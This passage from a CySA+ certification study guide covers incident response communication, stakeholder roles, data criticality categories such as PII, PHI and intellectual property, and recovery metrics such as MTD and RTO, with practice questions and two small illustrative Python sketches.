continuous deployment/delivery. It is considered the next generation of DevOps and attempts to make sure that software developers can release new changes to customers quickly in a sustainable way. Continuous deployment goes one step further: every change that passes all stages of the production pipeline is released to customers. This helps to improve the feedback loop. Figure 14-5 illustrates the
relationship between the three concepts.
Figure 14-5 Continuous Integration, Continuous Delivery,
and Continuous Deployment
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 14-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 14-2 Key Topics in Chapter 14
Key Topic Element | Description | Page Number
Figure 14-1 | Workflow orchestration | 422
Bulleted list | Common scripting languages | 423
Bulleted list | Scripting tools | 423
Figure 14-3 | Data enrichment example | 425
Bulleted list | Threat feed aggregation tools | 426
Bulleted list | SCAP components | 427
Figure 14-4 | Continuous integration | 428
Figure 14-5 | Continuous integration, continuous delivery, and continuous deployment | 429
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
workflow orchestration
scripting
application programming interface (API) integration
bash
Node.js
Ruby
Python
Perl
automated malware signature creation
data enrichment
threat feed
machine learning
Security Content Automation Protocol (SCAP)
Common Configuration Enumeration (CCE)
Common Platform Enumeration (CPE)
Common Weakness Enumeration (CWE)
Common Vulnerabilities and Exposures (CVE)
continuous integration
continuous deployment/delivery
REVIEW QUESTIONS
1. _______________ is the sequencing of events based on
certain parameters by using scripting and scripting tools.
2. List at least one use of workflow orchestration in the
security world.
3. Match the following terms with their definitions.
Terms:
1. Ruby
2. Perl
3. Python
4. bash
Definitions:
a. Used to work in the Linux interface
b. Framework to write network applications using JavaScript
c. Supports procedure-oriented programming and object-oriented programming
d. Great for web development
4. __________________ is a scripting tool found in
Windows servers.
5. List at least two of the components of SCAP.
6. Puppet is a ________________________ tool.
7. List at least two types of information available from threat
feeds.
8. Match the following SCAP terms with their definitions.
Terms:
1. CCE
2. CVE
3. CWE
4. CPE
Definitions:
a. Methods for describing and classifying operating systems, applications, and hardware devices
b. Vulnerabilities in published operating systems and applications software
c. Design flaws in the development of software that can lead to vulnerabilities
d. Configuration best practice statements maintained by NIST
9. _________________________ is a software
development practice whereby the work of multiple
individuals is combined a number of times a day.
10. List at least two threat feed aggregation tools.
11. Match the following terms with their definitions.
Terms:
1. Threat feed
2. Data enrichment
3. Automated malware signature creation
4. API
Definitions:
a. Technique that allows one process to gather information from another process or source and then customize a response using the data from the second process or source
b. Set of clearly defined methods of communication between various software components
c. Constantly updating streams of indicators or artifacts derived from a source outside the organization
d. Additional method of identifying malware
12. ______________________ are groups of VMware
virtual machines that are managed and orchestrated as a
unit to provide a service to users.
Chapter 15
The Incident Response
Process
This chapter covers the following topics related to Objective 4.1
(Explain the importance of the incident response process) of the
CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification
exam:
Communication plan: Describes the proper incident response
processes for communication during an incident, which includes
limiting communications to trusted parties, disclosing based on
regulatory/legislative requirements, preventing inadvertent release
of information, using a secure method of communication, and
reporting requirements.
Response coordination with relevant entities: Describes the
entities with which coordination is required during an incident,
including legal, human resources, public relations, internal and
external, law enforcement, senior leadership, and regulatory bodies.
Factors contributing to data criticality: Identifies factors that
determine the criticality of an information resource, which include
personally identifiable information (PII), personal health
information (PHI), sensitive personal information (SPI), high value
asset, financial information, intellectual property, and corporate
information.
The incident response process is a formal approach to
responding to security issues. It attempts to avoid the
haphazard approach that can waste time and resources. This
chapter and the next chapter examine this process.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these six self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks.” Table 15-1 lists
the major headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 15-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Questions
Communication Plan | 1, 2
Response Coordination with Relevant Entities | 3, 4
Factors Contributing to Data Criticality | 5, 6
1. Which of the following is false with respect to the incident
response communication plan?
1. Organizations in certain industries may be required to comply
with regulatory or legislative requirements with regard to
communicating data breaches.
2. Content of these communications should include as much
information as possible.
3. All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan.
4. All communications that take place between the stakeholders should use a secure communication process.
2. Which of the following HIPAA rules requires covered
entities and their business associates to provide notification
following a breach of unsecured PHI?
1. Breach Notification Rule
2. Privacy Rule
3. Security Rule
4. Enforcement Rule
3. Which of the following is responsible for reviewing NDAs to
ensure support for incident response efforts?
1. Human resources
2. Legal
3. Management
4. Public relations
4. Which of the following is responsible for developing all
written responses to the outside world concerning an
incident and its response?
1. Human resources
2. Legal
3. Management
4. Public relations
5. Which of the following is any piece of data that can be used
alone or with other information to identify a single person?
1. Intellectual property
2. Trade secret
3. PII
4. PPP
6. Which of the following is not intellectual property?
1. Patent
2. Trade secret
3. Trademark
4. Contract
FOUNDATION TOPICS
COMMUNICATION PLAN
Over time, best practices have evolved for handling the
communication process between stakeholders. By following
these best practices, you have a greater chance of maintaining
control of the process and achieving the goals of incident
response. Failure to follow these guidelines can lead to lawsuits,
the premature alerting of the suspected party, potential
disclosure of sensitive information, and, ultimately, an incident
response process that is less effective than it could be.
Limiting Communication to Trusted Parties
During an incident, communications should take place only
with those who have been designated beforehand to receive
such communications. Moreover, the content of these
communications should be limited to what is necessary for each
stakeholder to perform his or her role.
Disclosing Based on Regulatory/Legislative Requirements
Organizations in certain industries may be required to comply
with regulatory or legislative requirements with regard to
communicating data breaches to affected parties and to those
agencies and legislative bodies promulgating these regulations.
The organization should include these communication types in
the communication plan.
Preventing Inadvertent Release of Information
All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan. Moreover, all information released to the
public and the press should be handled by public relations or
persons trained for this type of communication. The timing of
all communications should also be specified in the plan.
Using a Secure Method of Communication
All communications that take place between the stakeholders
should use a secure communication process to ensure that
information is not leaked or sniffed. Secure communication
channels and strong cryptographic mechanisms should be used
for these communications. The best approach is to create an out-of-band method of communication that does not use the regular corporate e-mail or VoIP systems. While personal cell phones can be a method for voice communication, file and data exchange should be through a method that provides end-to-end encryption, such as Off-the-Record (OTR) Messaging.
Reporting Requirements
Beyond the communication requirements within the
organization, there may be legal obligations to report to
agencies or governmental bodies during and following a security
incident. Especially when sensitive customer, vendor, or
employee records are exposed, organizations are required to
report this in a reasonable time frame.
For example, in the healthcare field, the HIPAA Breach
Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA
covered entities and their business associates to provide
notification following a breach of unsecured protected health
information (PHI). As another example, all 50 states, the
District of Columbia, Guam, Puerto Rico, and the Virgin Islands
have enacted legislation requiring private or governmental
entities to notify individuals of security breaches of information
involving personally identifiable information (PII). PHI and PII
are described in more detail later in this chapter.
RESPONSE COORDINATION WITH
RELEVANT ENTITIES
During an incident, proper communication among the various
stakeholders in the process is critical to the success of the
response. One key step that helps ensure proper communication
is to select the right people for the incident response (IR) team.
Because these individuals will be responsible for
communicating with stakeholders, communication skills should
be a key selection criterion for the IR team. Moreover, this team
should take the following steps when selecting individuals to
represent each stakeholder community:
Select representatives based on communication skills.
Hold regular meetings.
Use proper escalation procedures.
The following sections identify these stakeholders, discuss why
the communication process is important, describe best practices
for the communication process, and list the responsibilities of
various key roles involved in the response.
Legal
The role of the legal department is to do the following:
Review nondisclosure agreements (NDAs) to ensure support for
incident response efforts.
Develop wording of documents used to contact possibly affected
sites and organizations.
Assess site liability for illegal computer activity.
Human Resources
The role of the HR department involves the following
responsibilities in response:
Develop job descriptions for those persons who will be hired for
positions involved in incident response.
Create policies and procedures that support the removal of
employees found to be engaging in improper or illegal activity.
For example, HR should ensure that these activities are spelled
out in policies and new hire documents as activities that are
punishable by firing. This can help avoid employment disputes
when the firing occurs.
Public Relations
The role of public relations is managing the dialog between the
organization and the outside world. One person should be
designated to do all talking to the media so as to maintain a
consistent message. Responsibilities of the PR department
include the following:
Handling all press conferences that may be held
Developing all written responses to the outside world concerning the incident and its response
Internal and External
Most of the stakeholders will be internal to the organization but
not all. External stakeholders (law enforcement, industry
organizations, and media) should be managed separately from
the internal stakeholders. Communications to external
stakeholders may require a different and more secure medium.
Law Enforcement
Law enforcement may become involved in many incidents.
Sometimes they are required to become involved, but in many
instances, the organization is likely to invite law enforcement to
get involved. When making a decision about whether to involve
law enforcement, consider the following factors:
Law enforcement will view the incident differently than the
company security team views it. While your team may be more
motivated to stop attacks and their damage, law enforcement may
be inclined to let an attack proceed in order to gather more
evidence.
The expertise of law enforcement varies. While contacting local law
enforcement may be indicated for physical theft of computers and
similar incidents, involving law enforcement at the federal level,
where greater skill sets are available, may be indicated for more
abstract crimes and events. The USA PATRIOT Act enhanced the
investigatory tools available to law enforcement and expanded their
ability to look at e-mail communications, telephone records,
Internet communications, medical records, and financial records,
which can be helpful.
Before involving law enforcement, try to rule out other potential
causes of an event, such as accidents and hardware or software
failure.
In cases where laws have obviously been broken (child
pornography, for example), immediately get law enforcement
involved. This includes any felonies, regardless of how small the
loss to the company may have been.
Senior Leadership
The most important factor in the success of an incident
response plan is the support, both verbal and financial (through
the budget process), of senior leadership. Moreover, all other
levels of management should fall in line with support of all
efforts. Specifically, senior leadership’s role involves the
following:
Communicate the importance of the incident response plan to all
parts of the organization.
Create agreements that detail the authority of the incident response
team to take over business systems if necessary.
Create decision systems for determining when key systems must be
removed from the network.
Regulatory Bodies
Earlier in this chapter you learned that there are reporting
requirements to certain governmental bodies when a data
breach occurs. This makes these agencies external stakeholders.
Be aware of reporting requirements based on the industry in
which the organization operates. An incident response should
be coordinated with any regulatory bodies that regulate the
industry in which the organization operates.
FACTORS CONTRIBUTING TO DATA
CRITICALITY
Once the sensitivity and criticality of data are understood and
documented, the organization should work to create a data
classification system. Most organizations use either a
commercial business classification system or a military and
government classification system.
To properly categorize data types, a security analyst should be
familiar with some of the most sensitive types of data that the
organization may possess.
When responding to an incident, the criticality of the data at risk should be a prime consideration when assigning resources to the incident. The more critical the data at risk, the more resources should be assigned, because it becomes all the more urgent to identify and correct any settings or policies implicated in the incident.
Personally Identifiable Information (PII)
When considering technology and its use today, privacy is a
major concern of users. This privacy concern usually involves
three areas: which personal information can be shared with
whom, whether messages can be exchanged confidentially, and
whether and how one can send messages anonymously. Privacy
is an integral part of any security measures that an organization
takes.
As part of the security measures that organizations must take to
protect privacy, personally identifiable information
(PII) must be understood, identified, and protected. PII is any
piece of data that can be used alone or with other information to
identify a single person. Any PII that an organization collects
must be protected in the strongest manner possible. PII
includes full name, identification numbers (including driver’s
license number and Social Security number), date of birth, place
of birth, biometric data, financial account numbers (both bank
account and credit card numbers), and digital identities
(including social media names and tags).
Keep in mind that different countries and levels of government
can have different qualifiers for identifying PII. Security
professionals must ensure that they understand international,
national, state, and local regulations and laws regarding PII. As
the theft of this data becomes even more prevalent, you can
expect more laws to be enacted that will affect your job. Figure
15-1 shows examples of PII.
Figure 15-1 Personally Identifiable Information
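Organizations often script a first pass at identifying PII in stored text. The following minimal sketch matches only U.S.-style Social Security numbers and obvious e-mail addresses, so it is a starting point rather than a complete PII scanner.

```python
# Minimal PII identification sketch using regular expressions.
import re

PATTERNS = {
    'ssn': re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
    'email': re.compile(r'\b[\w.+-]+@[\w-]+\.[\w.]+\b'),
}

def find_pii(text):
    return {name: pat.findall(text) for name, pat in PATTERNS.items()
            if pat.findall(text)}

print(find_pii('Contact jdoe@example.com, SSN 123-45-6789'))
```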
The most far-reaching reaction to the issue of privacy is the set of measures in the EU General Data Protection Regulation (GDPR). The GDPR aims primarily to give individuals control over their personal data and to simplify the regulatory environment for international business by unifying the regulation within the EU.
Personal Health Information (PHI)
One particular type of PII that an organization might possess is
personal health information (PHI). PHI includes the
medical records of individuals and must be protected in specific
ways, as prescribed by the regulations contained in the Health
Insurance Portability and Accountability Act of 1996 (HIPAA).
HIPAA, also known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and
healthcare clearinghouses. It is enforced by the Office for Civil
Rights (OCR) of the Department of Health and Human Services
(HHS). It provides standards and procedures for storing, using,
and transmitting medical information and healthcare data.
HIPAA overrides state laws unless the state laws are stricter.
Additions to this law now extend its requirements to third
parties that do work for covered organizations in which those
parties handle this information.
Note
Objective 4.1 of the CySA+ exam refers to PHI as personal health information,
whereas HIPAA refers to it as protected health information.
Sensitive Personal Information (SPI)
Some types of information should receive special treatment, and
certain standards have been designed to protect this
information. This type of data is called sensitive personal
information (SPI). The best example of this is credit card
information. Almost all companies possess and process credit
card data. Holders of this data must protect it. Many of the
highest-profile security breaches that have occurred have
involved the theft of this data. The Payment Card Industry
Data Security Standard (PCI DSS) affects any
organizations that handle cardholder information for the major
credit card companies. The latest version at the time of writing
is 3.2.1. To prove compliance with the standard, an organization
must be reviewed annually. Although PCI DSS is not a law, this
standard has affected the adoption of several state laws.
High Value Assets
Some assets are not actually information but systems that
provide access to information. When these systems or groups of
systems provide access to data required to continue to do
business, they are called critical systems. While it is somewhat
simpler to arrive at a value for physical assets such as servers,
routers, switches, and other devices, in cases where these
systems provide access to critical data or are required to
continue a business-critical process, their value is more than the
replacement cost of the hardware. The assigned value should be
increased to reflect their importance in providing access to data or their role in continuing a critical process.
Financial Information
Financial and accounting data in today’s networks is typically
contained in accounting information systems (AISs). While
these systems offer valuable integration with other systems,
such as HR and customer relationship management systems,
this integration comes at the cost of creating a secure
connection between these systems. Many organizations are also
abandoning legacy accounting software for cloud-based vendors
to maximize profit. Cloud arrangements bring their own
security issues, such as the danger of data comingling in the
multitenancy environment that is common in public clouds.
Moreover, considering that a virtual infrastructure underlies
these cloud systems, all the dangers of the virtual environment
come into play.
Considering the criticality of this data and the need of the
organization to keep the bulk of it confidential, incidents that
target this type of information or the systems that provide
access to this data should be given high priority. The following
steps should be taken to protect this information:
Always ensure physical security of the building.
Ensure that a firewall is deployed at the perimeter and make use of
all its features, such as URL and application filtering, intrusion
prevention, antivirus scanning, and remote access via virtual
private networks and TLS/SSL encryption.
Diligently audit file and folder permissions on all server resources.
Encrypt all accounting data.
Back up all accounting data and store it on servers that use
redundant technologies such as RAID.
Intellectual Property
Intellectual property is a tangible or intangible asset to
which the owner has exclusive rights. Intellectual property law
is a group of laws that recognize exclusive rights for creations of
the mind. The intellectual property covered by this type of law
includes the following:
Patents
Trade secrets
Trademarks
Copyrights
The following sections explain these types of intellectual
properties and their internal protection.
Patent
A patent is granted to an individual or a company to protect an
invention that is described in the patent’s application. When the
patent is granted, only the patent owner can make, use, or sell
the invention for a period of time, usually 20 years. Although a
patent is considered one of the strongest intellectual property
protections available, the invention becomes public domain
after the patent expires, thereby allowing any entity to
manufacture and sell the product.
Patent litigation is common in today’s world. You commonly see
technology companies, such as Apple, HP, and Google, filing
lawsuits regarding infringement on patents (often against each
other). For this reason, many companies involve a legal team in
patent research before developing new technologies. Being the
first to be issued a patent is crucial in today’s highly competitive
market.
Any product that is produced and is currently undergoing the
patent application process is usually identified with the Patent
Pending seal, shown in Figure 15-2.
Figure 15-2 Patent Pending Seal
Trade Secret
A trade secret ensures that proprietary technical or business
information remains confidential. A trade secret gives an
organization a competitive edge. Trade secrets include recipes,
formulas, ingredient listings, and so on that must be protected
against disclosure. After a trade secret is obtained by or
disclosed to a competitor or the general public, it is no longer
considered a trade secret. Most organizations that have trade
secrets attempt to protect them by using nondisclosure
agreements (NDAs). An NDA must be signed by any entity that
has access to information that is part of a trade secret. Anyone
who signs an NDA will suffer legal consequences if the
organization is able to prove that the signer violated it.
Trademark
A trademark ensures that a symbol, a sound, or an expression
that identifies a product or an organization is protected from
being used by another organization. A trademark allows a
product or an organization to be recognized by the general
public. Most trademarks are marked with one of the
designations shown in Figure 15-3. If a trademark is not
registered, an organization should use a capital TM. If the
trademark is registered, an organization should use a capital R
that is encircled.
Figure 15-3 Trademark Designations
Copyright
A copyright ensures that a work that is authored is protected
from any form of reproduction or use without the consent of the
copyright holder, usually the author or artist who created the
original work. A copyright lasts longer than a patent.
Although the U.S. Copyright Office has several guidelines to
determine the amount of time a copyright lasts, the general rule
for works created after January 1, 1978, is the life of the author
plus 70 years. In 1996, the World Intellectual Property
Organization (WIPO) standardized the treatment of digital
copyrights. Copyright management information (CMI) is
licensing and ownership information that is added to any digital
work. In this standardization, WIPO stipulated that CMI
included in copyrighted material cannot be altered. The ©
symbol denotes a work that is copyrighted.
Securing Intellectual Property
Intellectual property of an organization, including patents,
copyrights, trademarks, and trade secrets, must be protected, or
the business loses any competitive advantage created by such
properties. To ensure that an organization retains the
advantages given by its IP, it should do the following:
Invest in well-written NDAs to be included in employment
agreements, licenses, sales contracts, and technology transfer
agreements.
Ensure that tight security protocols are in place for all computer
systems.
Protect trade secrets residing in computer systems with encryption
technologies or by limiting storage to computer systems that do not
have external Internet connections.
Deploy effective insider threat countermeasures, particularly
focused on disgruntlement detection and mitigation techniques.
Corporate Information
Corporate confidential data is anything that needs to be kept
confidential within the organization. This can include the
following:
Plan announcements
Processes and procedures that may be unique to the organization
Profit data and estimates
Salaries
Market share figures
Customer lists
Performance appraisals
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 15-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 15-2 Key Topics in Chapter 15
Key Topic Element
Description
Page Number
Bulleted list
Considerations when selecting individuals to represent each stakeholder community
436
Bulleted list
Role of the legal department in incident response
436
Bulleted list
Role of the HR department in incident response
437
Bulleted list
Role of the public relations department in incident response
437
Bulleted list
Considerations when making a decision about whether to involve law enforcement
438
Bulleted list
Role of senior leadership in incident response
438
Paragraph
Description of personally identifiable information (PII)
439
Bulleted list
Steps that should be taken to protect financial information
442
Bulleted list
Examples of intellectual property
442
Bulleted list
Securing intellectual property
444
Bulleted list
Examples of corporate confidential data
444
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
HIPAA Breach Notification Rule
USA PATRIOT Act
sensitivity
criticality
personally identifiable information (PII)
personal health information (PHI)
sensitive personal information (SPI)
Payment Card Industry Data Security Standard (PCI DSS)
intellectual property
patent
trade secret
trademark
copyright
REVIEW QUESTIONS
1. After a breach, all information released to the public and the
press should be handled by _________________.
2. List at least one job of the human resources department
with regard to incident response.
3. Match the following terms with their definitions.
Terms
Definitions
HIPAA Breach Notification Rule
Enhanced the investigatory tools available to law enforcement
USA PATRIOT Act
Affects any organizations that handle cardholder information for the major credit card companies
Payment Card Industry Data Security Standard (PCI DSS)
Requires covered entities and their business associates to provide notification following a loss of unsecured protected health information (PHI)
Kennedy-Kassebaum Act
Also known as HIPAA
4. It is the role of ____________________ to develop job
descriptions for those persons who will be hired for
positions involved in incident response.
5. List at least one of the roles of senior leadership in incident
response.
6. Match the following terms with their definitions.
Terms
Definitions
Personally identifiable information
Measure of the importance of the data
Criticality
Any piece of data that can be used alone or with other information to identify a single person
Sensitivity
Medical records of individuals
Personal health information
Measure of how freely data can be handled
7. The most important factor in the success of an incident
response plan is the support, both verbal and financial
(through the budget process), of ________________
8. List at least one consideration when assigning a level of
criticality.
9. Match the following terms with their definitions.
Terms
Definitions
Patent
Gives an organization a competitive edge; includes recipes, formulas, ingredient listings, and so on
Trade secret
Identifies a product protected from being used by another organization
Trademark
Ensures that a work that is authored is protected from any form of reproduction or use without the consent of the holder
Copyright
Granted to an individual or a company to protect an invention
10. Salaries of employees are considered
_________________________________________.
Chapter 16
Applying the Appropriate
Incident Response
Procedure
This chapter covers the following topics related to Objective 4.2
(Given a scenario, apply the appropriate incident response
procedure) of the CompTIA Cybersecurity Analyst (CySA+) CS0-002 certification exam:
Preparation: Describes steps required to be ready for an incident,
including training, testing, and documentation of procedures.
Detection and analysis: Covers detection methods and analysis,
exploring topics such as characteristics contributing to severity level
classification, downtime, recovery time, data integrity, economic
impact, system process criticality, reverse engineering, and data
correlation.
Containment: Identifies methods used to separate and confine
the damage, including segmentation and isolation.
Eradication and recovery: Defines activities that return the
network to normal, including vulnerability mitigation, sanitization,
reconstruction/reimaging, secure disposal, patching, restoration of
permissions, reconstitution of resources, restoration of capabilities
and services, and verification of logging/communication to security
monitoring.
Post-incident activities: Identifies operations that should follow
incident recovery, including evidence retention, lessons learned
report, change control process, incident response plan update,
incident summary report, IoC generation, and monitoring.
When a security incident occurs, there are usually several
possible responses. Choosing the correct response and
appropriately applying that response is a critical part of the
process. This second chapter devoted to the incident response
process presents the many considerations that go into making
the correct decisions regarding response.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
16-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 16-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Preparation
1, 2
Detection and Analysis
3, 4
Containment
5, 6
Eradication and Recovery
7, 8
Post-Incident Activities
9, 10
1. Which of the following is the first step in the incident
response process?
1. Containment
2. Eradication and recovery
3. Preparation
4. Detection
2. Which of the following groups should receive technical
training on configuring and maintaining security controls?
1. High-level management
2. Middle management
3. Technical staff
4. Employees
3. Which of the following characteristics of an incident is a
function of how widespread the incident is?
1. Scope
2. Downtime
3. Data integrity
4. Indicator of compromise
4. Which of the following is the average time required to repair
a single resource or function?
1. RPO
2. MTD
3. MTTR
4. RTO
5. Which of the following processes involves limiting the scope
of an incident by leveraging existing segments of the
network as barriers to prevent the spread to other segments?
1. Isolation
2. Segmentation
3. Containerization
4. Partitioning
6. How do you isolate a device at Layer 2 without removing it
from the network?
1. Port security
2. Isolation
3. Secured memory
4. Processor encryption
7. Which of the following includes removing data from the
media so that it cannot be reconstructed using normal file
recovery techniques and tools?
1. Destruction
2. Clearing
3. Purging
4. Buffering
8. Which of the following refers to removing all traces of a
threat by overwriting the drive multiple times to ensure that
the threat is removed?
1. Destruction
2. Clearing
3. Purging
4. Sanitization
9. Which of the following refers to behaviors and activities that
precede or accompany a security incident?
1. IoCs
2. NOCs
3. IONs
4. SOCs
10. Which of the following is the first document that should be
drafted after recovery from an incident?
1. Incident summary report
2. Incident response plan
3. Lessons learned report
4. IoC document
FOUNDATION TOPICS
PREPARATION
When security incidents occur, the quality of the response is
directly related to the amount and the quality of the
preparation. Responders should be well prepared and equipped
with all the tools they need to provide a robust response. Several
key activities must be carried out to ensure this is the case.
Training
The terms security awareness training, security training, and
security education are often used interchangeably, but they are
actually three different things. Basically, security awareness
training is the what, security training is the how, and security
education is the why. Security awareness training reinforces the
fact that valuable resources must be protected by implementing
security measures. Security training teaches personnel the skills
they need to perform their jobs in a secure manner.
Organizations often combine security awareness training and
security training and label it as “security awareness training” for
simplicity; the combined training improves user awareness of
security and ensures that users can be held accountable for their
actions. Security education is more independent, targeted at
security professionals who require security expertise to act as
in-house experts for managing the security programs.
Security awareness training should be developed based on the
audience. In addition, trainers must understand the corporate
culture and how it will affect security. The audiences you need
to consider when designing training include high-level
management, middle management, technical personnel, and
other staff.
For high-level management, the security awareness training
must provide a clear understanding of potential risks and
threats, effects of security issues on organizational reputation
and financial standing, and any applicable laws and regulations
that pertain to the organization’s security program. Middle
management training should discuss policies, standards,
baselines, guidelines, and procedures, particularly how these
components map to individual departments. Also, middle
management must understand their responsibilities regarding
security. Technical staff should receive technical training on
configuring and maintaining security controls, including how to
recognize an attack when it occurs. In addition, technical staff
should be encouraged to pursue industry certifications and
higher education degrees. Other staff need to understand their
responsibilities regarding security so that they perform their
day-to-day tasks in a secure manner. With these staff, providing
real-world examples to emphasize proper security procedures is
effective.
Personnel should sign a document that indicates they have
completed the training and understand all the topics. Although
the initial training should occur when personnel are hired,
security awareness training should be considered a continuous
process, with future training sessions occurring at least
annually.
Testing
After incident response processes have been developed as
described in Chapter 15, “The Incident Response Process,”
responders should test the process to ensure it is effective. In
Chapter 20, “Applying Security Concepts in Support of
Organizational Risk Mitigation,” you’ll learn about exercises
that can be performed that help to test your response to a live
attack (red team/blue team/white team exercises and tabletop
exercises). The results of tests along with the feedback from live
events can help to inform the lessons learned report, described
later in this chapter.
Documentation of Procedures
Incident response procedures should be clearly documented.
While many incident response plan templates can be found
online (and even the outline of this chapter is organized by one
set of procedures), a generally accepted incident response plan
is shown in Figure 16-1 and described in the list that follows.
Figure 16-1 Incident Response Process
Step 1. Detect: The first step is to detect the incident. The
worst sort of incident is one that goes unnoticed.
Step 2. Respond: The response to the incident should be
appropriate for the type of incident. A denial of service
(DoS) attack against a web server would require a
quicker and different response than a missing mouse
in the server room. Establish standard responses and
response times ahead of time.
Step 3. Report: All incidents should be reported within a
time frame that reflects the seriousness of the incident.
In many cases, establishing a list of incident types and
the person to contact when each type of incident
occurs is helpful. Attention to detail at this early stage,
while time-sensitive information is still available, is
critical.
Step 4. Recover: Recovery involves a reaction designed to
make the network or system affected functional again.
Exactly what that means depends on the circumstances
and the recovery measures available. For example, if
fault-tolerance measures are in place, the recovery
might consist of simply allowing one server in a cluster
to fail over to another. In other cases, it could mean
restoring the server from a recent backup. The main
goal of this step is to make all resources available
again.
Step 5. Remediate: This step involves eliminating any
residual danger or damage to the network that still
might exist. For example, in the case of a virus
outbreak, it could mean scanning all systems to root
out any additional affected machines. These measures
are designed to make a more detailed mitigation when
time allows.
Step 6. Review: Finally, you need to review each incident to
discover what can be learned from it. Changes to
procedures might be called for. Share lessons learned
with all personnel who might encounter the same type
of incident again. Complete documentation and
analysis are the goals of this step.
The actual investigation of an incident occurs during the
respond, report, and recover steps. Following appropriate
forensic and digital investigation processes during an
investigation can ensure that evidence is preserved.
Your responses will benefit from using standard forms that
prompt for the collection of all relevant information that can
lead to a better and more consistent response process over time.
Some examples of commonly used forms are as follows:
Incident form: This form is used to describe the incident in detail.
It should include sections to record complementary metal oxide
semiconductor (CMOS), hard drive information, image archive
details, analysis platform information, and other details. The best
approach is to obtain a template and customize it to your needs.
Call list/escalation list: First responders to an incident should
have contact information for all individuals who might need to be
alerted during the investigation. This list should also indicate under
what circumstance these individuals should be contacted to avoid
unnecessary alerts and to keep the process moving in an organized
manner.
DETECTION AND ANALYSIS
Once evidence from an incident has been collected, it must be
analyzed and classified as to its severity so that more critical
incidents can be dealt with first and less critical incidents later.
Characteristics Contributing to Severity Level
Classification
To properly prioritize incidents, each must be classified with
respect to the scope of the incident and the types of data that
have been put at risk. Scope is more than just how widespread
the incident is, and the types of data classifications may be more
varied than you expect. The following sections discuss the
factors that contribute to incident severity and prioritization.
The scope determines the impact and is a function of how
widespread the incident is and the potential economic and
intangible impacts it could have on the business. Five common
factors are used to measure scope. They are covered in the
following sections.
Downtime and Recovery Time
One of the issues that must be considered is the potential
amount of downtime the incident could inflict and the time it
will take to recover from the incident. If a proper business
continuity plan (BCP) has been created, you will have collected
information about each asset that will help classify incidents
that affect each asset.
As part of determining how critical an asset is, you need to
understand the following terms (a short worked sketch follows the list):
Maximum tolerable downtime (MTD): This is the maximum
amount of time that an organization can tolerate a single resource
or function being down. This is also referred to as maximum period
time of disruption (MPTD).
Mean time to repair (MTTR): This is the average time required
to repair a single resource or function when a disaster or disruption
occurs.
Mean time between failures (MTBF): This is the estimated
amount of time a device will operate before a failure occurs. This
amount is calculated by the device vendor. System reliability is
increased by a higher MTBF and lower MTTR.
Recovery time objective (RTO): This is the shortest time
period after a disaster or disruptive event within which a resource
or function must be restored in order to avoid unacceptable
consequences. RTO assumes that an acceptable period of downtime
exists. RTO should be smaller than MTD.
Work recovery time (WRT): This is the difference between
RTO and MTD, which is the remaining time that is left over after
the RTO before reaching the MTD.
Recovery point objective (RPO): This is the point in time to
which the disrupted resource or function must be returned.
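These values are related by simple arithmetic: WRT is the time remaining between the RTO and the MTD. The following minimal Python sketch (the hour values are hypothetical, and the function name is ours) validates a proposed RTO against the MTD and derives the WRT:

# Hypothetical recovery-planning values, in hours.
MTD = 24  # maximum tolerable downtime
RTO = 8   # recovery time objective; must be smaller than MTD

def work_recovery_time(mtd_hours, rto_hours):
    """WRT = MTD - RTO: the time left after recovery to verify systems and resume work."""
    if rto_hours >= mtd_hours:
        raise ValueError("RTO must be smaller than MTD")
    return mtd_hours - rto_hours

print(f"WRT = {work_recovery_time(MTD, RTO)} hours")  # prints: WRT = 16 hours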
Each organization must develop its own documented criticality
levels. The following is a good example of organizational
resource and function criticality levels:
Critical: Critical resources are those resources that are most vital
to the organization’s operation and should be restored within
minutes or hours of the disaster or disruptive event.
Urgent: Urgent resources should be restored within 24 hours but
are not considered as important as critical resources.
Important: Important resources should be restored within 72
hours but are not considered as important as critical or urgent
resources.
Normal: Normal resources should be restored within 7 days but
are not considered as important as critical, urgent, or important
resources.
Nonessential: Nonessential resources should be restored within
30 days.
Data Integrity
Data integrity refers to the correctness, completeness, and
soundness of the data. One of the goals of integrity services is to
protect the integrity of data or at least to provide a means of
discovering when data has been corrupted or has undergone an
unauthorized change. One of the challenges with data integrity
attacks is that the effects might not be detected for years—until
there is a reason to question the data. Identifying the
compromise of data integrity can be made easier by using file-hashing algorithms and tools to check seldom-used but
sensitive files for unauthorized changes after an incident. These
tools can be run to quickly identify files that have been altered.
They can help you get a better assessment of the scope of the
data corruption.
